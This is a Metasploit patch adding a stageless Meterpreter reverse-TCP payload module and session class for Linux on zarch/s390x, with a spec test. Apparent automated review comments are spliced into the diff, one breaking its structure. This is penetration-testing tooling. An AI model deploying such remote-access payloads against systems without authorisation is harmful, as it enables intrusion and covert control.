From ccba73b324a4093648a2386f72e0357d5d0d8470 Mon Sep 17 00:00:00 2001
From: Adam Cammack
Date: Fri, 9 Dec 2016 18:30:52 -0600
Subject: [PATCH] Add stageless mettle for Linux/zarch
---
.../base/sessions/meterpreter_zarch_linux.rb | 29 +++++++++++++
.../singles/linux/zarch/mettle_reverse_tcp.rb | 41 +++++++++++++++++++
spec/modules/payloads_spec.rb | 10 +++++
3 files changed, 80 insertions(+)
create mode 100644 lib/msf/base/sessions/meterpreter_zarch_linux.rb
create mode 100644 modules/payloads/singles/linux/zarch/mettle_reverse_tcp.rb
diff --git a/lib/msf/base/sessions/meterpreter_zarch_linux.rb b/lib/msf/base/sessions/meterpreter_zarch_linux.rb
new file mode 100644
index 0000000000..65ac0f1e96
--- /dev/null
+++ b/lib/msf/base/sessions/meterpreter_zarch_linux.rb
@@ -0,0 +1,29 @@
+# -*- coding: binary -*-
+
+require 'msf/base/sessions/meterpreter'
+
+module Msf
+module Sessions
+
+###
+#
+# This class creates a platform-specific meterpreter session type
+#
+###
+class Meterpreter_zarch_Linux < Msf::Sessions::Meterpreter
+ def supports_ssl?
+ false
+ end
+ def supports_zlib?
+ false
+ end
+ def initialize(rstream, opts={})
+ super
+ self.base_platform = 'linux'
+ self.base_arch = ARCH_ZARCH
+ end
+end
+
+end
+end
+
diff --git a/modules/payloads/singles/linux/zarch/mettle_reverse_tcp.rb b/modules/payloads/singles/linux/zarch/mettle_reverse_tcp.rb
new file mode 100644
index 0000000000..9f74d416ff
--- /dev/null
+++ b/modules/payloads/singles/linux/zarch/mettle_reverse_tcp.rb
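Review bot: The two capability predicates in `Meterpreter_zarch_Linux` (`supports_ssl?` and `supports_zlib?`) return `false` with no comment saying why, and the class header comment only says it creates a platform-specific session type. If, as the method names suggest, this means the session channel for this target is neither TLS-wrapped nor compressed, that should be stated so that anyone running or reviewing an engagement knows session traffic may not be encrypted at this layer; a comment such as `# mettle on zarch: no TLS wrapping or zlib compression of the session channel (confirm)` above the two methods would do. A short comment on the bare `super` in `initialize`, noting that it forwards `rstream` and `opts` unchanged before the platform and arch are set, would also help.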
@@ -0,0 +1,41 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_zarch_linux'
+
+module MetasploitModule
+
+ CachedSize = 367864
+
+ include Msf::Payload::Single
+ include Msf::Sessions::MeterpreterOptions
+ include Msf::Sessions::MettleConfig
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Linux Meterpreter',
+ 'Description' => 'Run the mettle server payload (stageless)',
+ 'Author' => [
+ 'Adam Cammack '
+ ],
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_ZARCH,
+ 'License' => MSF_LICENSE,
+ 'Handler' => Msf::Handler::ReverseTcp,
+ 'Session' => Msf::Sessions::Meterpreter_zarch_Linux
+ )
+ )
+ end
+
+ def generate
+ MetasploitPayloads::Mettle.new('s390x-linux-musl', generate_config).to_binary :exec
+ end
+end
diff --git a/spec/modules/payloads_spec.rb b/spec/modules/payloads_spec.rb
index b9636bddb4..8ca160f866 100644
--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -4524,4 +4524,14 @@ RSpec.describe 'modules/payloads', :content do reference_name: 'linux/x86/mettle_reverse_tcp' end + context 'linux/zarch/mettle_reverse_tcp' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/zarch/mettle_reverse_tcp' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/zarch/mettle_reverse_tcp' + end + + end
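Review bot: In mettle_reverse_tcp.rb the `'Name' => 'Linux Meterpreter'` and `'Description'` entries passed to `update_info` mention neither the reverse-TCP handler nor the zarch target, so this module is presumably hard to tell apart from other Linux Meterpreter payloads in listings, logs and engagement reports. A name such as `'Name' => 'Linux Meterpreter, Reverse TCP Inline'` and a description that states the connect-back transport would fix that. `generate` also hard-codes the `'s390x-linux-musl'` triple with no comment tying it to `ARCH_ZARCH`. `CachedSize = 367864` carries no note that it must be regenerated whenever the bundled binary changes; the spec hunk that follows checks it with `dynamic_size: false`.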